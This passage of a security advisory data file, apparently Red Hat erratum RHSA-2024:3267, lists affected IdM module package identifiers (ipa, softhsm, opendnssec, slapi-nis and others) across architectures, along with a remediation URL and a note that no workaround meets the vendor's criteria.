"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
